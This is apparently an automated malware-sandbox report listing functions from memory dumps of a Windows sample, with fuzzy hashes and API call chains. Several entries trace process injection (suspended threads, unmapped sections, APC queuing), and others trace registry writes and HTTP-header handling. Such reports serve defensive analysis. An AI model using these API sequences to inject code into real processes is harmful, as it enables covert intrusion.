Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
